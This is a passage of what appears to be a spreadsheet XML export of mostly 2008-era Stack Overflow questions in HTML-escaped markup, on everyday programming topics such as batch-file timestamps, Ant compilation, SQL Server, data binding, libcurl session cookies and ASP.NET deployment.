set _my_datetime=%_my_datetime:/=_%
set _my_datetime=%_my_datetime:.=_%
rem Now use the timestamp by in a new ZIP file name.
"d:\Program Files\7-Zip\7z.exe" a -r Code_%_my_datetime%.zip Code
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can live with this, but it seems a bit clunky. Ideally it'd be briefer and have the format mentioned earlier.&lt;/p&gt;
&lt;p&gt;I'm using Windows Server 2003 and Windows&amp;nbsp;XP Professional. I don't want to install additional utilities to achieve this (although I realise there are some that will do nice date formatting).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>compiling only part of the source tree with ant</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have my sources in my src/ tree (and possibly in my test/ tree). Say I would like to compile only &lt;em&gt;part&lt;/em&gt; of that tree. The reasons why I might want to do that are various. Just as an example, I might want to create the smallest possible jar (without including certain classes), or I might want the fastest compile time for what I am compiling. I absolutely want to compile all the dependencies, though!&lt;/p&gt;
&lt;p&gt;This can be easily achieved from the command line with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;javac -d build/ -cp whatever -sourcepath src src/path/to/MyClass.java
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, how can you do that with ant? The javac ant &lt;a href="http://ant.apache.org/manual/Tasks/javac.html"&gt;task compiles everything&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The source and destination directory
  will be recursively scanned for Java
  source files to compile.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;One can use the &lt;code&gt;excludes&lt;/code&gt; and &lt;code&gt;includes&lt;/code&gt; parameters, but they are problematic for this purpose. In fact, it seems that one has to explicitly setup all the &lt;code&gt;includes&lt;/code&gt; (not automatic dependency lookup), and &lt;strong&gt;even worst&lt;/strong&gt; that &lt;a href="http://ant.apache.org/manual/dirtasks.html#patternset"&gt;excludes has priority on includes&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;When both inclusion and exclusion are
  used, only files/directories that
  match at least one of the include
  patterns and don't match &lt;em&gt;any&lt;/em&gt; of the
  exclude patterns are used.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Thus, you cannot use &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;javac srcdir="${src.dir}" destdir="${build.dir}" classpathref="classpath"
            excludes="**/*.java" includes="src/path/to/MyClass.java" /&amp;gt;  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Because it will not compile anything :-(&lt;/p&gt;
&lt;p&gt;Is there any way of achieving that simple command line &lt;code&gt;javac&lt;/code&gt; with ant?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;EDITED: Thank you for your answer, Sadie, I'm accepting it, because it does work in the way I was wondering in this question. But I have a couple of comments (too long to be in the comment field of your answer):&lt;/p&gt;
&lt;p&gt;1) I did read the documentation (see links above), but it's unclear that with just &lt;code&gt;includes&lt;/code&gt; you are actually also excluding everything else&lt;/p&gt;
&lt;p&gt;2) When you just &lt;code&gt;includes&lt;/code&gt; ant logs something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[javac] Compiling 1 source file to /my/path/to/build
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;even if the dependencies make it compiling (much) more than just one source file.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Undo changes to SQL Server 2005 database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've ran some "ALTER" scripts on the database [SQL Server Server 2005], and overwrote some sprocs. Is there any way to undo changes and get my old sprocs back?&lt;/p&gt;
&lt;p&gt;Is there a way to get the scripts that were executed out of the .LDf file? That way i can re-run my initial "create" script for my sprocs.&lt;/p&gt;
&lt;p&gt;I don't have a backup file with old sprocs.&lt;/p&gt;
&lt;p&gt;p.s. i backed the DB up as per &lt;a href="http://stackoverflow.com/users/4337/gulzar"&gt;@Gulzar's&lt;/a&gt; deleted answer, and looks like I'm "hosed".&lt;/p&gt;
&lt;p&gt;@Pittsburgh DBA: thanx for the solution, but it doesn't seem to work after the backup.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MORAL: Wait for 10 minutes before trying the suggested answers out&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update from Gulzar&lt;/strong&gt;: What I meant was a file backup before trying anything (to be safe). Not a SQL Server backup.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JQuery: Current, Well-Formatted, Printable Documentation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a current (1.2), well-formatted, printable version of the jQuery documentation.  I've checked the alternative resources page and see the PDF versions from CF and Java, but both are out of date.&lt;/p&gt;
&lt;p&gt;The jQuery site has the API browser with "Printable Version" in the toolbox, but it prints terribly, and I don't really want to print one page or tab at a time.&lt;/p&gt;
&lt;p&gt;I have a hard time believing that there is no print doc for a tool this popular - all I want is a simple listing with descriptions and examples ON PAPER.&lt;/p&gt;
&lt;p&gt;Am I missing something?&lt;/p&gt;
&lt;p&gt;I can buy one of the books if I need to, but not sure which is for the current version.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;
I can see that somebody voted this down.  I know it's a pretty basic question, but it is not asked lightly or frivolously.  I have made a pretty solid effort to find this on my own, and am pretty good at finding information when I need it.&lt;/p&gt;
&lt;p&gt;Perhaps the person who thought the question not worth asking knows where to find the print doc?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I discriminate between data binding and user actions on WinForm controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have what must be a typical catch-22 problem.  I have a .NET WinForm control that contains a textbox and a checkbox.  Both controls are data bound to properties on a data class instance.  The textbox is for price, the check box to indicate that the price is a price override.  Also on the data class is a property that holds the item's original price.&lt;/p&gt;
&lt;p&gt;I would like the controls to respect the following rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;When the user enters a value into the price textbox, the checkbox is automatically checked to indicate they are overriding the price value&lt;/li&gt;
&lt;li&gt;When the check box is un-checked, the item's price is restored to the original price.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When the user unchecks the checkbox, the event handler tests the checked state, and sets the item's price property to the original price value.  However, the price value being databound, a bind event is fired, which updates the textbox value, which fires the text changed event handler which re-checks the checkbox. &lt;/p&gt;
&lt;p&gt;I've attempted to trap the conditions where I'm explicitly updating something that would trigger a control change event.  This only works for part of it though.  The textbox change event fires other times that are outside my control, such as when databinding fires when the form is initially shown.&lt;/p&gt;
&lt;p&gt;I've been searching around and I guess I'm just not coming up with the right search terms to find what I'm looking for.  It seems that databinding is all wonderful and nifty until you need to do something pratical with it, like having two bound controls interact with each other.  There just doesn't seem to be a way to discriminate between what triggered the control events.&lt;/p&gt;
&lt;p&gt;I've also looked at the events available on the binding source component but there doesn't seem to be anything there that is any more useful.  I can handle the event that fires after binding is complete, but that's after the problems occur.&lt;/p&gt;
&lt;p&gt;Anyone have any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Include directory in VS 2003</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where is the setting in Visual Studio 2003 to set the include path for individual projects?  I know about the VC Directories option in Tools&gt;Options but that is machine specific and won't help when I hand this off to other developers.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make a bilingual site without creating a separate ASP page for each language?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need ideas on how to go about table layout problem.
I want to set different width of the columns dependent on the picked language.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do my XSL transformed links come out relative to the base?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;&amp;lt;a&amp;gt;
 &amp;lt;xsl:attribute name="href"&amp;gt;
 &amp;lt;xsl:value-of select="link" /&amp;gt;
 &amp;lt;/xsl:attribute&amp;gt;
 &amp;lt;xsl:attribute name="target"&amp;gt;new&amp;lt;/xsl:attribute&amp;gt;
 &amp;lt;xsl:value-of select="title" /&amp;gt;
 &amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thats my template, and in my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; sb.Append("&amp;lt;title&amp;gt;");
 sb.AppendFormat("{0} - {1}", f.UserName, f.PointTypeDesc);
 sb.Append("&amp;lt;/title&amp;gt;");
 sb.Append("&amp;lt;link&amp;gt;");
 sb.AppendFormat("{0}", HttpUtility.UrlEncode(url));
 sb.Append("&amp;lt;/link&amp;gt;");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;url is "http://www.cnn.com"&lt;/p&gt;
&lt;p&gt;But it renders as: "http://localhost/&lt;a href="http://www.cnn.com" rel="nofollow"&gt;http://www.cnn.com&lt;/a&gt;"&lt;/p&gt;
&lt;p&gt;any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best datatype to use for storing moderate amounts of text in SQL Server (2005)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best datatype to use for storing moderate amounts of text in SQL Server (2005)?&lt;/p&gt;
&lt;p&gt;For example, imagine a table, storing information on downloads available on a website.
I want a title for the download which is brief, say varchar(20). A path, say varchar(255) then I want to store some user friendly text about the download - a description. In some cases it could be as short as the title, other times you may need a few of paragraphs of explanation.&lt;/p&gt;
&lt;p&gt;What's best?  A varchar with a size of say 4000, or a varchar(max) or something else?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Memory in SWF (Flash Player)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any limitations on the amount of memory that the flash player can use? If you have a swf that over time gets a lot of data from the server, then more and more data will be kept in memory... Is there a limitation on this?&lt;/p&gt;
&lt;p&gt;Thx, Lieven Cardoen&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating sine or square wave in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I generate an audio sine or square wave of a given frequency?&lt;/p&gt;
&lt;p&gt;I am hoping to do this to calibrate equipment, so how precise would these waves be?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# streaming sockets, how to separate messages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Kinda long title, but anyways...&lt;/p&gt;
&lt;p&gt;I've been looking at these examples, specifically on the parts on writing and reading the size of the message to the byte streams&lt;br /&gt;
&lt;a href="http://doc.trolltech.com/4.4/network-fortuneclient-client-cpp.html" rel="nofollow"&gt;http://doc.trolltech.com/4.4/network-fortuneclient-client-cpp.html&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://doc.trolltech.com/4.4/network-fortuneserver-server-cpp.html" rel="nofollow"&gt;http://doc.trolltech.com/4.4/network-fortuneserver-server-cpp.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;But I can't seem to figure it out in C#.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;StreamWriter writer = new StreamWriter(tcpClient.GetStream());
writer.Write(data.Length + data);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This doesn't work very well at all. Could someone give me a nudge in the right direction?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to manage a simple PHP session using C++ cURL (libcurl)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a C++ client which is using libcurl for communicating with a PHP script.&lt;/p&gt;
&lt;p&gt;The communication should be session based, and thus the first task is to login and make the PHP script set up a session.&lt;/p&gt;
&lt;p&gt;I'm not used to working with sessions either from C++ or PHP. I basically know that it has to do with cookies and communicating session id.&lt;/p&gt;
&lt;p&gt;I can't find any example on the curl homepage which demonstrates a simple session management use case.&lt;/p&gt;
&lt;p&gt;I'm assuming it has something to do with one or many of the following options in curl:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CURLOPT_COOKIE
CURLOPT_COOKIEFILE
CURLOPT_COOKIEJAR
CURLOPT_COOKIESESSION
CURLOPT_COOKIELIST
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I can't really see the big picture just from the documentation of CURLOPT_COOKIESESSION for instance.&lt;/p&gt;
&lt;p&gt;Anybody who has done this, please share a simple piece of code which shows the concept.&lt;/p&gt;
&lt;p&gt;Regards&lt;/p&gt;
&lt;p&gt;Robert&lt;/p&gt;
</t>
  </si>
  <si>
    <t>getting the last modified date of a html file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;how can i figure out the last modified date of a html file im importing into my web app?&lt;/p&gt;
&lt;p&gt;The html file is on another server and different users can make updates, when i retrieve the page i want to be able see when it was last updated so i can label the updated date on my homepage. I&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What should I call a REBOL function that does list comprehensions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;REBOL has no built-in way to perform list comprehensions. However, REBOL has a powerful facility (known as &lt;code&gt;parse&lt;/code&gt;) that can be used to create domain-specific languages (DSLs). I've used &lt;code&gt;parse&lt;/code&gt; to create such a mini-DSL for list comprehensions. In order to interpret the expression, the block containing the comprehension is passed to a function, which for lack of a better term I've called &lt;code&gt;comprehend&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;comprehend [(a * b) for a in 1x100 for b in 4x10 where (all [odd? a odd? b])]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For some reason, &lt;code&gt;comprehend&lt;/code&gt; doesn't sound right to me, but something like &lt;code&gt;eval&lt;/code&gt; is too general.&lt;/p&gt;
&lt;p&gt;I haven't found any other language that requires a keyword or function for list comprehensions. They are pure syntactic sugar wherever they exist. Unfortunately I don't have that option. So, seeing that I must have a function, what's a good, succinct, logical name for it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MSSQL2000: get list of role members</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know a role name and want to find all users in this role. 
How do I acheive this in SQL Server 2000 (in the SQL script, not in Management Studio or other tool)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Moving items in Dual Listboxes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I move items from one list box control to another listbox control using JavaScript in ASP.NET?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to update a text or ntext field in SQL Server 2000</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I need to update a text field.  Neither the UPDATE statement or the WRITETEXT statement work when used below&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE MyTable (IDField int, MyField text)
INSERT INTO MyTable (IDField) SELECT 1
DECLARE @Data1 varchar(8000), @Data2 varchar(8000), @ptrval binary(16)
SELECT @Data1 = REPLICATE('1',8000)
SELECT @Data2 = REPLICATE('2',8000)
-- this sets MyField to string of only 8000 characters
UPDATE MyTable SET MyField = @Data1 + @Data2 WHERE IDField = 1 
SELECT @ptrval = TEXTPTR(MyField ) 
FROM MyTable 
WHERE IDField = 1 
-- this causes an error: Incorrect syntax near '+'.
--WRITETEXT MyTable.MyField @ptrval @Data1 + @Data2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How am I supposed to do this when local variables cannot be of type TEXT?  (If I had SSQL Server 2005 I would use varchar(max) - but I don't)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spreadsheet-like control for a web application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A client of mine is looking to convert a critical 'application' based on multiple (very complex) spreadsheets into a web app.  As part of this they'd like some of the web pages they use to enter/model data to resemble a spreadsheet as much as possible.&lt;/p&gt;
&lt;p&gt;I'd be interested to know if anyone has any experience/recommendations for embeddable controls that could do this better than standard html/javascript/ajax code - although suggestions for Javascript frameworks that could do this are welcome too.  I'm thinking mainly of ActiveX, Flex, Java or similar controls, commercial or open source are fine.&lt;/p&gt;
&lt;p&gt;The coding languages to be used and platform is still open to debate, so ASP.NET against IE or PHP/Flex against Firefox, or some other combination is fine - this will be driven by the business requirement not the platform.  &lt;/p&gt;
&lt;p&gt;Functionality is of course the main driving force, but it's always useful to have nice looking eye candy so skinable and cool is a plus.  With reference to Javascript frameworks I''ve previously used Dojo and Mootools, but I'd prefer something with a bit more snap.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Initialising a struct variable to Nullable&lt;int&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to declare a variable as Nullable in c#?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct MyStruct {        
    int _yer, _ner;
    public MyStruct() {
        _yer = Nullable&amp;lt;int&amp;gt;; //This does not work.
        _ner = 0;
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What's the term for design ala "object.method1().method2().method3()"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the term for this design?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;object.method1().method2().method3()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;..when all methods return *this?&lt;/p&gt;
&lt;p&gt;I found the term for this a while ago, but lost it meanwhile.
I have no clue how to search for this on google :)
Also if anyone can think of a better title for the question, feel free to change it.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update-Gishu&lt;/strong&gt;: After reading about it, I feel that your question is misleading w.r.t. code snippet provided.. (Feel free to rollback)&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Method Chaining&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;object.method1().method2().method3()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Fluent Interfaces&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void makeFluent(Customer customer) {
        customer.newOrder()
                .with(6, "TAL")
                .with(5, "HPK").skippable()
                .with(3, "LGV")
                .priorityRush();
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Directory of APIs/WebServices - where do I find one?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where do I find a directory where a lot of APIs or Webservices are collected? I'd like to generate a Web Site getting its content from different services, but I assume that spidering together the content is not legal (e.g. getting the latest financial data from finance.yahoo.com).&lt;/p&gt;
&lt;p&gt;So I would like to have a list of APIs and WebServices (not only financially related) where I can search for such services. It would also help to generate 'new' ideas, while reading through the list =&gt; I'm sure there are a lot of services I do not even think of.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Encrypt on iSeries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tools are available to encrypt or password-protect a file stored on the IFS?&lt;/p&gt;
&lt;p&gt;*integrated file-system, accessible from Windows&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Version control "in the clouds"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a developer who works on both individual and group projects using Microsoft Visual Studio.  I could setup one of several different source control packages, such as VSS, SourceGear Vault or SVN on a server of my own and access them remotely; however, I don't want to deal with the hassle of setting it up, configuring it, etc.&lt;/p&gt;
&lt;p&gt;Does anyone offer a hosted source control service?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any experience with the Deliverance system?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My new boss went to a speech where Deliverance, a kind of proxy allowing to add skin to any html output on the fly, was presented. He decided to use it right after that, no matter how young it is.&lt;/p&gt;
&lt;p&gt;More here :&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.openplans.org/projects/deliverance/introduction" rel="nofollow"&gt;http://www.openplans.org/projects/deliverance/introduction&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In theory, the system sounds great when you want a newbie to tweak your plone theme without having to teach him all the complex mechanisms behind the zope products. And apply the same theme on a Drupal web site in one row.&lt;/p&gt;
&lt;p&gt;But I don't believe in theory, and would like to know if anybody tried this out in the real world :-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Deploy time Webservice location</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my Visual Studio Web application project I am adding a reference to a web service. When I add a web reference the following list of files gets generated. &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Reference.map&lt;/li&gt;
&lt;li&gt;Reference.vb&lt;/li&gt;
&lt;li&gt;Reference.disco&lt;/li&gt;
&lt;li&gt;Reference.wsdl&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All these files contains the url pointing to the web service. Even when I move it to a machine without visual studio, it works fine. But if I intend to change the url of the web service, I need to modify &lt;em&gt;all these four files&lt;/em&gt; by editing them using notepad. &lt;/p&gt;
&lt;p&gt;Instead of this, is there any way I can have the url in the config file and just change it in one place and the web service are pointed to the new location.&lt;/p&gt;
&lt;p&gt;I am using framework 1.1. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does anybody familiar with big projects that was build with linqtoSql ORM?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;does it cost cost effective ? 
how can i profile the Sql calls to the server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way for retrieving single record results in LINQ to SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I query a table with a condition on the key field as in:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        var user = from u in dc.Users
                   where u.UserName == usn
                   select u;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know that I will either get zero results or one result. Should I still go ahead and retrieve the results using a for-each or is there another preferred way to handle this kind of situation. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are threads reused between requests in ASP.Net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just wondering if the same thread is used for each session, or if its dangerous to count on a particular thread between requests. What I'm getting at, is can I use thread static storage?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Server-side .NET PDF editing library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best .NET PDF editing library available, and why?&lt;/p&gt;
&lt;p&gt;It needs to be used on an IIS web-server.
Specifically, I need to edit a PDF which was generated by reporting services.&lt;/p&gt;
&lt;p&gt;Factors I'm interested in:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Speed&lt;/li&gt;
&lt;li&gt;Memory Consumption&lt;/li&gt;
&lt;li&gt;Price&lt;/li&gt;
&lt;li&gt;Quality of documentation&lt;/li&gt;
&lt;li&gt;Library stability&lt;/li&gt;
&lt;li&gt;Size of library&lt;/li&gt;
&lt;li&gt;Whatever else you think is important&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Tool for parsing smtp logs that finds bounces</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our web application sends e-mails. We have lots of users, and we get lots of bounces. For example, user changes company and his company e-mail is no longer valid.&lt;/p&gt;
&lt;p&gt;To find bounces, I parse smtp log file with log parser.&lt;/p&gt;
&lt;p&gt;Some bounces are great, like &lt;code&gt;550+#5.1.0+Address+rejected+user@domain.com&lt;/code&gt;. There is &lt;code&gt;user@domain.com&lt;/code&gt; in bounce.&lt;/p&gt;
&lt;p&gt;But some do not have e-mail in error message, like &lt;code&gt;550+No+such+recipient&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I have created simple ruby script that parses logs (uses log parser) to find which mail caused something like &lt;code&gt;550+No+such+recipient&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I am just surprised that I could not find a tool that does it. I have found tools like zabbix and splunk for log analysis, but they look like overkill for such simple task.&lt;/p&gt;
&lt;p&gt;Anybody knows a tool that would parse smtp logs, find bounces and e-mails that cause them?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; smtp server is microsoft smtp server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Krypton Form not showing up in Visual Studio Professional 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have just installed the Krypton Toolkit 3.0.6 from component Factory.
I find that in the create new Project Dialog Box , Krypton Form does not show up as an option. I am sure it used to show up ( and I have actually used it in an earlier version of krypton toolkit).But after the new install it does not.&lt;/p&gt;
&lt;p&gt;Has anyone else faced this situation and can help.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I split a string on a fixed character sequence?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose I have following string:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String asd = "this is test ass this is test"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I want to split the string using "ass" character sequence.&lt;/p&gt;
&lt;p&gt;I used:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;asd.split("ass");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It doesn't work. What do I need to do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I display a dataset or group as a comma delimited list in SSRS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my SQL database, I have a one-to-many relationship, something like this:&lt;/p&gt;
&lt;pre&gt;
Teacher  Student
John     Alex
John     Mike
John     Sean
Bob      Jack
Gary     George
Gary     Paul
&lt;/pre&gt;
&lt;p&gt;I'd like to display a table listing each teacher, with their students as a comma-delimited list, like this:&lt;/p&gt;
&lt;pre&gt;
Teacher  Students
John     Alex, Mike, Sean
Bob      Jack
Gary     George, Paul
&lt;/pre&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/180032/how-can-i-combine-multiple-rows-into-a-comma-delimited-list-in-sql-server-2005"&gt;This question&lt;/a&gt; describes how to do this on the SQL Server end, but is there a way to do this on the SSRS side of things?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the deal with all the different UIDs a process can have?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Real UID, effective UID, and some systems even have a "saved UID". What's the purpose of all these, especially the last one?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Master page from external library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to put my master pages in a central library so I can use them in several projects without having the maintanance nightmare.
Everything is refactored in a generic and central way, they are all in a "shared" namespace.
But if put them in a seperate project, I can't reference them&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET trusted DB connection to other server works in Casini, not in IIS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our website connects to a database correctly when running the website locally using the built-in web server.  But, when we deploy the site to our server running IIS, we get a database connection error.  The database server is different from our IIS server.  Note that a trusted connection to a different database on the SAME server as IIS works fine.&lt;/p&gt;
&lt;p&gt;What do we need to do to connect to a SQL database on a different server with a trusted connection?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What can cause intermittent ORA-12519 (TNS: no appropriate handler found) errors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are running our Junit 4 test suite against Weblogic 9 in front of an Oracle 10 database (using Hudson as a continuous integration server) and occasionally we will get an ORA-12519 crash during script teardown.  However, the error is very intermittent:  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It usually happens for the same Test class  &lt;/li&gt;
&lt;li&gt;It doesn't always happen for the same test cases (sometimes they pass)  &lt;/li&gt;
&lt;li&gt;It doesn't happen for the same number of test cases (anywhere from 3-9)  &lt;/li&gt;
&lt;li&gt;Sometimes it doesn't happen at all, everything passes  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;While I can't guarantee this doesn't happen locally (when running against the same database, of course), I have run the same suite of class multiple times with no issues.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to print a PDF from the browser</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a Web application, is it possible to force a PDF file to be printed on the client? If the browser is configured to open the PDF inside the window, I guess that calling window.print() will work, but some browsers (like mine) are configured to open the PDF externally.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Select from same table as an Insert or Update</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Clearly the following is incorrect.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT INTO `aTable` (`A`,`B`) VALUES((SELECT MAX(`A`) FROM `aTable`)*2),'name');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get the value:&lt;/p&gt;
&lt;p&gt;SQL query: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT INTO `aTable` (`A`, `B` )
VALUES 
(
  (
   SELECT MAX(`A`)
   FROM `aTable`
  ) *2
 , 'name'
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;MySQL said:&lt;/p&gt;
&lt;p&gt;1093 - You can't specify target table 'aTable' for update in FROM clause &lt;/p&gt;
&lt;p&gt;So, I'm trying to make a bitmap table, each row corresponds to one Bit, and has a 'map' value.&lt;/p&gt;
&lt;p&gt;To insert in the table, I don't want to do two queries, I want to do one.
How should I do this?&lt;/p&gt;
&lt;p&gt;No one commented on this, but since I am trying to make a bitmap, it should be * 2 not ^ 2, my mistake, please note that is why the comments often say ^ 2, it was an error in the version that the commenters read.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Axis2 Web Service Client Generation - Types without modifying the client</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible with Axis2 and Eclipse to generate a Web Service client and have it use java types that you already have in packages instead of creating it's own types.  Reason being of course if I have type A already created and it creates it's own Type A I can't just assign variable of type A to variable of type B.&lt;/p&gt;
&lt;p&gt;The wsdl is being generated from a Web Service deployed to an application server. 
If it's not possible to generate it from that would it be possible to generate a client from the already existing java files.&lt;/p&gt;
</t>
  </si>
